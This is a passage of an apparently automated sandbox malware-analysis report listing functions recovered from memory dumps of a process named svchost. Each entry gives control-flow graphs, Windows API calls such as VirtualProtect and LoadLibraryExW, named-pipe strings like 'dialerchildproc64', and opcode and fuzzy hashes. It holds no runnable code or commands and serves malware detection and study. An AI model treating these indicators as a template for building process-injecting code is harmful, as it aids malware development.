                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                      • API String ID: 2171963597-1373409510
                                                                      • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction ID: 8d495f9292460a9735da5ed95210fda6fbe957da3286c33244c8f36ea02638a3
                                                                      • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction Fuzzy Hash: 52219032258B508AF710CBA4E4857A963A1F3857AAF400215DA5E82BA8CF3EC149CB40
                                                                      Function 000001CBD8BDA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 575 1cbd8bda544-1cbd8bda5ac call 1cbd8bdb414 578 1cbd8bdaa13-1cbd8bdaa1b call 1cbd8bdc748 575->578 579 1cbd8bda5b2-1cbd8bda5b5 575->579 579->578 580 1cbd8bda5bb-1cbd8bda5c1 579->580 582 1cbd8bda5c7-1cbd8bda5cb 580->582 583 1cbd8bda690-1cbd8bda6a2 580->583 582->583 587 1cbd8bda5d1-1cbd8bda5dc 582->587 585 1cbd8bda6a8-1cbd8bda6ac 583->585 586 1cbd8bda963-1cbd8bda967 583->586 585->586 588 1cbd8bda6b2-1cbd8bda6bd 585->588 590 1cbd8bda969-1cbd8bda970 586->590 591 1cbd8bda9a0-1cbd8bda9aa call 1cbd8bd9634 586->591 587->583 589 1cbd8bda5e2-1cbd8bda5e7 587->589 588->586 593 1cbd8bda6c3-1cbd8bda6ca 588->593 589->583 594 1cbd8bda5ed-1cbd8bda5f7 call 1cbd8bd9634 589->594 590->578 595 1cbd8bda976-1cbd8bda99b call 1cbd8bdaa1c 590->595 591->578 601 1cbd8bda9ac-1cbd8bda9cb call 1cbd8bd7940 591->601 597 1cbd8bda894-1cbd8bda8a0 593->597 598 1cbd8bda6d0-1cbd8bda707 call 1cbd8bd9a10 593->598 594->601 609 1cbd8bda5fd-1cbd8bda628 call 1cbd8bd9634 * 2 call 1cbd8bd9d24 594->609 595->591 597->591 602 1cbd8bda8a6-1cbd8bda8aa 597->602 598->597 613 1cbd8bda70d-1cbd8bda715 598->613 606 1cbd8bda8ba-1cbd8bda8c2 602->606 607 1cbd8bda8ac-1cbd8bda8b8 call 1cbd8bd9ce4 602->607 606->591 612 1cbd8bda8c8-1cbd8bda8d5 call 1cbd8bd98b4 606->612 607->606 619 1cbd8bda8db-1cbd8bda8e3 607->619 642 1cbd8bda648-1cbd8bda652 call 1cbd8bd9634 609->642 643 1cbd8bda62a-1cbd8bda62e 609->643 612->591 612->619 617 1cbd8bda719-1cbd8bda74b 613->617 621 1cbd8bda887-1cbd8bda88e 617->621 622 1cbd8bda751-1cbd8bda75c 617->622 625 1cbd8bda8e9-1cbd8bda8ed 619->625 626 1cbd8bda9f6-1cbd8bdaa12 call 1cbd8bd9634 * 2 call 1cbd8bdc6a8 619->626 621->597 621->617 622->621 627 1cbd8bda762-1cbd8bda77b 622->627 628 1cbd8bda900 625->628 629 1cbd8bda8ef-1cbd8bda8fe call 1cbd8bd9ce4 625->629 626->578 630 1cbd8bda874-1cbd8bda879 627->630 631 1cbd8bda781-1cbd8bda7c6 call 1cbd8bd9cf8 * 2 627->631 639 1cbd8bda903-1cbd8bda90d call 1cbd8bdb4ac 628->639 629->639 635 1cbd8bda884 630->635 656 1cbd8bda7c8-1cbd8bda7ee call 1cbd8bd9cf8 call 1cbd8bdac38 631->656 657 1cbd8bda804-1cbd8bda80a 631->657 635->621 639->591 654 1cbd8bda913-1cbd8bda961 call 1cbd8bd9944 call 1cbd8bd9b50 639->654 642->583 660 1cbd8bda654-1cbd8bda674 call 1cbd8bd9634 * 2 call 1cbd8bdb4ac 642->660 643->642 647 1cbd8bda630-1cbd8bda63b 643->647 647->642 652 1cbd8bda63d-1cbd8bda642 647->652 652->578 652->642 654->591 675 1cbd8bda815-1cbd8bda872 call 1cbd8bda470 656->675 676 1cbd8bda7f0-1cbd8bda802 656->676 664 1cbd8bda80c-1cbd8bda810 657->664 665 1cbd8bda87b 657->665 680 1cbd8bda676-1cbd8bda680 call 1cbd8bdb59c 660->680 681 1cbd8bda68b 660->681 664->631 666 1cbd8bda880 665->666 666->635 675->666 676->656 676->657 685 1cbd8bda686-1cbd8bda9ef call 1cbd8bd92ac call 1cbd8bdaff4 call 1cbd8bd94a0 680->685 686 1cbd8bda9f0-1cbd8bda9f5 call 1cbd8bdc6a8 680->686 681->583 685->686 686->626
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction ID: f93e4a1daa0d78cdaddb0cd674ab4af90492db7ec0da77687cb0fc27551b55aa
                                                                      • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction Fuzzy Hash: 2DE18D72648B40AAFB209FE59482BED77A2F74479DF141115DE8F97B96CB3AC081C780
                                                                      Function 000001CBD8BA9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 454 1cbd8ba9944-1cbd8ba99ac call 1cbd8baa814 457 1cbd8ba9e13-1cbd8ba9e1b call 1cbd8babb48 454->457 458 1cbd8ba99b2-1cbd8ba99b5 454->458 458->457 459 1cbd8ba99bb-1cbd8ba99c1 458->459 461 1cbd8ba99c7-1cbd8ba99cb 459->461 462 1cbd8ba9a90-1cbd8ba9aa2 459->462 461->462 466 1cbd8ba99d1-1cbd8ba99dc 461->466 464 1cbd8ba9d63-1cbd8ba9d67 462->464 465 1cbd8ba9aa8-1cbd8ba9aac 462->465 469 1cbd8ba9d69-1cbd8ba9d70 464->469 470 1cbd8ba9da0-1cbd8ba9daa call 1cbd8ba8a34 464->470 465->464 467 1cbd8ba9ab2-1cbd8ba9abd 465->467 466->462 468 1cbd8ba99e2-1cbd8ba99e7 466->468 467->464 473 1cbd8ba9ac3-1cbd8ba9aca 467->473 468->462 474 1cbd8ba99ed-1cbd8ba99f7 call 1cbd8ba8a34 468->474 469->457 471 1cbd8ba9d76-1cbd8ba9d9b call 1cbd8ba9e1c 469->471 470->457 480 1cbd8ba9dac-1cbd8ba9dcb call 1cbd8ba6d40 470->480 471->470 477 1cbd8ba9c94-1cbd8ba9ca0 473->477 478 1cbd8ba9ad0-1cbd8ba9b07 call 1cbd8ba8e10 473->478 474->480 488 1cbd8ba99fd-1cbd8ba9a28 call 1cbd8ba8a34 * 2 call 1cbd8ba9124 474->488 477->470 481 1cbd8ba9ca6-1cbd8ba9caa 477->481 478->477 492 1cbd8ba9b0d-1cbd8ba9b15 478->492 485 1cbd8ba9cba-1cbd8ba9cc2 481->485 486 1cbd8ba9cac-1cbd8ba9cb8 call 1cbd8ba90e4 481->486 485->470 491 1cbd8ba9cc8-1cbd8ba9cd5 call 1cbd8ba8cb4 485->491 486->485 501 1cbd8ba9cdb-1cbd8ba9ce3 486->501 522 1cbd8ba9a2a-1cbd8ba9a2e 488->522 523 1cbd8ba9a48-1cbd8ba9a52 call 1cbd8ba8a34 488->523 491->470 491->501 497 1cbd8ba9b19-1cbd8ba9b4b 492->497 498 1cbd8ba9c87-1cbd8ba9c8e 497->498 499 1cbd8ba9b51-1cbd8ba9b5c 497->499 498->477 498->497 499->498 503 1cbd8ba9b62-1cbd8ba9b7b 499->503 504 1cbd8ba9df6-1cbd8ba9e12 call 1cbd8ba8a34 * 2 call 1cbd8babaa8 501->504 505 1cbd8ba9ce9-1cbd8ba9ced 501->505 507 1cbd8ba9c74-1cbd8ba9c79 503->507 508 1cbd8ba9b81-1cbd8ba9bc6 call 1cbd8ba90f8 * 2 503->508 504->457 509 1cbd8ba9cef-1cbd8ba9cfe call 1cbd8ba90e4 505->509 510 1cbd8ba9d00 505->510 513 1cbd8ba9c84 507->513 535 1cbd8ba9c04-1cbd8ba9c0a 508->535 536 1cbd8ba9bc8-1cbd8ba9bee call 1cbd8ba90f8 call 1cbd8baa038 508->536 518 1cbd8ba9d03-1cbd8ba9d0d call 1cbd8baa8ac 509->518 510->518 513->498 518->470 533 1cbd8ba9d13-1cbd8ba9d61 call 1cbd8ba8d44 call 1cbd8ba8f50 518->533 522->523 527 1cbd8ba9a30-1cbd8ba9a3b 522->527 523->462 539 1cbd8ba9a54-1cbd8ba9a74 call 1cbd8ba8a34 * 2 call 1cbd8baa8ac 523->539 527->523 532 1cbd8ba9a3d-1cbd8ba9a42 527->532 532->457 532->523 533->470 543 1cbd8ba9c7b 535->543 544 1cbd8ba9c0c-1cbd8ba9c10 535->544 555 1cbd8ba9c15-1cbd8ba9c72 call 1cbd8ba9870 536->555 556 1cbd8ba9bf0-1cbd8ba9c02 536->556 560 1cbd8ba9a76-1cbd8ba9a80 call 1cbd8baa99c 539->560 561 1cbd8ba9a8b 539->561 545 1cbd8ba9c80 543->545 544->508 545->513 555->545 556->535 556->536 564 1cbd8ba9a86-1cbd8ba9def call 1cbd8ba86ac call 1cbd8baa3f4 call 1cbd8ba88a0 560->564 565 1cbd8ba9df0-1cbd8ba9df5 call 1cbd8babaa8 560->565 561->462 564->565 565->504
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2574823849.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8ba0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction ID: a62b4a5be1d7a59fcf86fd4f7d53b3e4fe5156bf132faf2773fff64dd797c087
                                                                      • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction Fuzzy Hash: 49E19C32648B408AFB608BE5D482BFD37A0F745B8DF100106EE9E87B96CB76C094C784
                                                                      Function 000001CBD8BDF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 696 1cbd8bdf394-1cbd8bdf3e6 697 1cbd8bdf4d7 696->697 698 1cbd8bdf3ec-1cbd8bdf3ef 696->698 701 1cbd8bdf4d9-1cbd8bdf4f5 697->701 699 1cbd8bdf3f9-1cbd8bdf3fc 698->699 700 1cbd8bdf3f1-1cbd8bdf3f4 698->700 702 1cbd8bdf402-1cbd8bdf411 699->702 703 1cbd8bdf4bc-1cbd8bdf4cf 699->703 700->701 704 1cbd8bdf413-1cbd8bdf416 702->704 705 1cbd8bdf421-1cbd8bdf440 LoadLibraryExW 702->705 703->697 706 1cbd8bdf516-1cbd8bdf525 GetProcAddress 704->706 707 1cbd8bdf41c 704->707 708 1cbd8bdf4f6-1cbd8bdf50b 705->708 709 1cbd8bdf446-1cbd8bdf44f GetLastError 705->709 712 1cbd8bdf527-1cbd8bdf54e 706->712 713 1cbd8bdf4b5 706->713 710 1cbd8bdf4a8-1cbd8bdf4af 707->710 708->706 711 1cbd8bdf50d-1cbd8bdf510 FreeLibrary 708->711 714 1cbd8bdf496-1cbd8bdf4a0 709->714 715 1cbd8bdf451-1cbd8bdf468 call 1cbd8bdc928 709->715 710->702 710->713 711->706 712->701 713->703 714->710 715->714 718 1cbd8bdf46a-1cbd8bdf47e call 1cbd8bdc928 715->718 718->714 721 1cbd8bdf480-1cbd8bdf494 LoadLibraryExW 718->721 721->708 721->714
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3013587201-537541572
                                                                      • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction ID: 32bd6cb2b4fe6735583b648f74334685912bda2f5fa339ee11d04b3235dc61ab
                                                                      • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction Fuzzy Hash: 3041133239DB01A5FA12CBD6A881BF52792FB45BAAF0441258D0FD7795EB3BC405C380
                                                                      Function 000001CBD8BD104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction ID: 066eb5fd8941bfc650680b4864ba2459917eed432ccf800f44e515a7831a054b
                                                                      • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction Fuzzy Hash: 6D419033218B80DAE761CFA1E4857AFB7A1F389B99F049119DA8E47758DF3AC445CB40
                                                                      Function 000001CBD8BDD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FlsGetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD087
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD0A6
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD0CE
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD0DF
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD0F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: 1%$Y%
                                                                      • API String ID: 3702945584-1395475152
                                                                      • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction ID: 71d4662aedf6dbd697b56d36903d8f4ddc6a5a38ef4483e9cb1097fa8a6fd393
                                                                      • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction Fuzzy Hash: 8311933038D34052FA6457F599D3BF92243DB843A9F185624586FC67E5DF1BC401C280
                                                                      Function 000001CBD8BD7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: 0106aeadf5537429d751d842193ee5b2217affcef9ad2f21424a8c74e39b0775
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: EE8105B068C701AAFA519BE594C3FF92692E74578EF144425990FC7796EB3BC403C788
                                                                      Function 000001CBD8BD9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction ID: c9b8f5ea63e900bb7e76ad3c81d051b3b44ab0de19cb25040923075a332a8adb
                                                                      • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction Fuzzy Hash: A731F63124A700F6FE169BC2A481BF522D5B748BAAF1906259D2F87791DF3BC459C380
                                                                      Function 000001CBD8BE3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction ID: eb7377fe2b6302bf55bf176071237aa04aac1f273150e96e86d659a293cea9b9
                                                                      • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction Fuzzy Hash: 5D115131258B408AF7528BD2E895B6977A0F789FEAF044214EA6FC7794CB3BC514C780
                                                                      Function 000001CBD8BD3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                      • String ID: wr
                                                                      • API String ID: 1092925422-2678910430
                                                                      • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction ID: 59217231f7a3652f0728cb9fcaba971148e9c2b568802b1bfc5c67614d1d01f2
                                                                      • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction Fuzzy Hash: D111AC36748B408AFF158BD1E085AA962A1F789B8AF040028DE8F87756EF3FC504C744
                                                                      Function 000001CBD8BD5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Current$Context
                                                                      • String ID:
                                                                      • API String ID: 1666949209-0
                                                                      • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                      • Instruction ID: 2535d574b1785d2b1a42f984cfa41e71c2a54c3512dbc8327d59fc37f128c4a0
                                                                      • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                      • Instruction Fuzzy Hash: 93D1BE76249B4891EA70DB86E4917AE77B1F388B89F100116EACF87B65CF7EC541CB40
                                                                      Function 000001CBD8BD2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: dialer
                                                                      • API String ID: 756756679-3528709123
                                                                      • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction ID: 1cba4eec41f719f4423791475f4ed57158e1c05105fd208c51b5bbf463187363
                                                                      • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction Fuzzy Hash: 77311532349B5096F611CFD6E581BBA6395FB44B8AF0844209E4F83B5AEF37D460C380
                                                                      Function 000001CBD8BDCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction ID: 537801d7384df499510b0516e733ebe0744c8f24ed2dd7c99d327c711a9b615e
                                                                      • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction Fuzzy Hash: B2116F3028D34062FA2557F195D3BF92253AB847BEF141724A86FC67E6DF2BC401C280
                                                                      Function 000001CBD8BD199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction ID: 4e1a75a037d890f7a3af027752f69dd1f5d83a83d0a6e2d613213ff947cde410
                                                                      • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction Fuzzy Hash: 80018E31348B408AF611CBD2A488BAA63A1F749BCAF444035DE5E83754DF3AC589C380
                                                                      Function 000001CBD8BD36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction ID: 7f1ef5d5059ce12c61f5d97a27b9455fb86792ee4b09ca0f56259de58aeb52b2
                                                                      • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction Fuzzy Hash: 6D016574659B408AFB259BD1E48ABA567A1B749B8BF040425CD4F87765EF3FC104C740
                                                                      Function 000001CBD8BD9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: 4c990827edacdc3879a7cb4c8e50599e697146fcddd6f7e908c96fcc5a92b3c1
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: 1B517D32649701AAFB149B95E48AFBA27D7F345B9EF119124DA1F83748EB37D840C780
                                                                      Function 000001CBD8BD8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: 5b401db059e9ca29837f15a6baad8a1f4cd991064a946fc7a0a4d37f863a2710
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: F9318E31248740AAF714DF91E886BBA37A6F344B8EF058124AE4F83745DB3BD940C784
                                                                      Function 000001CBD8BD1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000043.00000002.2575117446.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_67_2_1cbd8bd0000_svchost.jbxd
